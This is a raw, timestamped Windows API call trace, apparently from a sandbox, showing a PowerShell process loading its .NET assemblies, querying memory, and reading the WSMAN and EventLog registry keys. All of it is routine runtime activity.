	[0176.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.253] VirtualQuery (in: lpAddress=0x13b450, lpBuffer=0x13c310, dwLength=0x30 | out: lpBuffer=0x13c310*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.254] VirtualQuery (in: lpAddress=0x13b4e0, lpBuffer=0x13c3a0, dwLength=0x30 | out: lpBuffer=0x13c3a0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.255] VirtualQuery (in: lpAddress=0x13bc60, lpBuffer=0x13cb20, dwLength=0x30 | out: lpBuffer=0x13cb20*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.256] VirtualQuery (in: lpAddress=0x13bc60, lpBuffer=0x13cb20, dwLength=0x30 | out: lpBuffer=0x13cb20*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0179.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0179.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0179.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0179.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0179.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0179.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0180.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0180.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0180.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0180.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0198.035] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0198.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0198.036] CoTaskMemFree (pv=0x2158c0) 
	[0198.037] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0198.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0198.037] CoTaskMemFree (pv=0x2158c0) 
	[0198.038] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0198.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0198.038] CoTaskMemFree (pv=0x2158c0) 
	[0198.039] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0198.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0198.039] CoTaskMemFree (pv=0x2158c0) 
	[0198.050] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0198.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0198.050] CoTaskMemFree (pv=0x2158c0) 
	[0198.056] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0198.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0198.056] CoTaskMemFree (pv=0x2158c0) 
	[0198.057] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0198.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0198.057] CoTaskMemFree (pv=0x2158c0) 
	[0198.493] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d428 | out: phkResult=0x13d428*=0x158) returned 0x0
	[0198.499] RegQueryInfoKeyW (in: hKey=0x158, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13d32c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d328, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13d32c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d328*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0198.499] CoTaskMemFree (pv=0x0) 
	[0198.500] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0198.500] RegEnumValueW (in: hKey=0x158, dwIndex=0x0, lpValueName=0x1f89c0, lpcchValueName=0x13d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x13d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0198.500] CoTaskMemFree (pv=0x1f89c0) 
	[0198.500] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0198.500] RegEnumValueW (in: hKey=0x158, dwIndex=0x1, lpValueName=0x1f89c0, lpcchValueName=0x13d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x13d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0198.500] CoTaskMemFree (pv=0x1f89c0) 
	[0198.500] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0198.500] RegEnumValueW (in: hKey=0x158, dwIndex=0x2, lpValueName=0x1f89c0, lpcchValueName=0x13d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x13d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0198.500] CoTaskMemFree (pv=0x1f89c0) 
	[0198.502] RegQueryValueExW (in: hKey=0x158, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13d3bc, lpData=0x0, lpcbData=0x13d3b8*=0x0 | out: lpType=0x13d3bc*=0x1, lpData=0x0, lpcbData=0x13d3b8*=0x8) returned 0x0
	[0198.502] CoTaskMemAlloc (cb=0xc) returned 0x1b905f20
	[0198.502] RegQueryValueExW (in: hKey=0x158, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13d38c, lpData=0x1b905f20, lpcbData=0x13d388*=0x8 | out: lpType=0x13d38c*=0x1, lpData="2.0", lpcbData=0x13d388*=0x8) returned 0x0
	[0203.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d378 | out: phkResult=0x13d378*=0x308) returned 0x0
	[0203.622] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13d27c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d278, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13d27c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d278*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.622] CoTaskMemFree (pv=0x0) 
	[0203.622] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0203.622] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x1f89c0, lpcchValueName=0x13d328, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x13d328, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.622] CoTaskMemFree (pv=0x1f89c0) 
	[0203.622] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0203.622] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x1f89c0, lpcchValueName=0x13d328, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x13d328, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.622] CoTaskMemFree (pv=0x1f89c0) 
	[0203.622] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0203.622] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x1f89c0, lpcchValueName=0x13d328, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x13d328, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.622] CoTaskMemFree (pv=0x1f89c0) 
	[0203.622] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13d30c, lpData=0x0, lpcbData=0x13d308*=0x0 | out: lpType=0x13d30c*=0x1, lpData=0x0, lpcbData=0x13d308*=0x8) returned 0x0
	[0203.622] CoTaskMemAlloc (cb=0xc) returned 0x1b905e40
	[0203.622] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x13d2dc, lpData=0x1b905e40, lpcbData=0x13d2d8*=0x8 | out: lpType=0x13d2dc*=0x1, lpData="2.0", lpcbData=0x13d2d8*=0x8) returned 0x0
	[0203.622] CoTaskMemFree (pv=0x1b905e40) 
	[0203.624] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0203.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.624] CoTaskMemFree (pv=0x2158c0) 
	[0203.628] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0203.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.112] CoTaskMemFree (pv=0x2158c0) 
	[0204.117] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d3a8 | out: phkResult=0x13d3a8*=0x30c) returned 0x0
	[0204.123] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x13d31c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d318, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x13d31c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x13d318*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.123] CoTaskMemFree (pv=0x0) 
	[0204.124] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.124] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.125] CoTaskMemFree (pv=0x1f89c0) 
	[0204.126] CoTaskMemFree (pv=0x0) 
	[0204.126] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.126] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.127] CoTaskMemFree (pv=0x1f89c0) 
	[0204.127] CoTaskMemFree (pv=0x0) 
	[0204.127] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.127] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.129] CoTaskMemFree (pv=0x1f89c0) 
	[0204.129] CoTaskMemFree (pv=0x0) 
	[0204.129] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.129] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.130] CoTaskMemFree (pv=0x1f89c0) 
	[0204.130] CoTaskMemFree (pv=0x0) 
	[0204.130] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.130] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.131] CoTaskMemFree (pv=0x1f89c0) 
	[0204.131] CoTaskMemFree (pv=0x0) 
	[0204.132] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.132] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.133] CoTaskMemFree (pv=0x1f89c0) 
	[0204.133] CoTaskMemFree (pv=0x0) 
	[0204.133] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.133] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.134] CoTaskMemFree (pv=0x1f89c0) 
	[0204.134] CoTaskMemFree (pv=0x0) 
	[0204.134] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.134] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.135] CoTaskMemFree (pv=0x1f89c0) 
	[0204.135] CoTaskMemFree (pv=0x0) 
	[0204.136] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0204.136] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x1f89c0, lpcchName=0x13d3a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x13d3a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.137] CoTaskMemFree (pv=0x1f89c0) 
	[0204.137] CoTaskMemFree (pv=0x0) 
	[0204.137] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x310) returned 0x0
	[0204.137] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x0) returned 0x2
	[0204.137] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d408 | out: phkResult=0x13d408*=0x324) returned 0x0
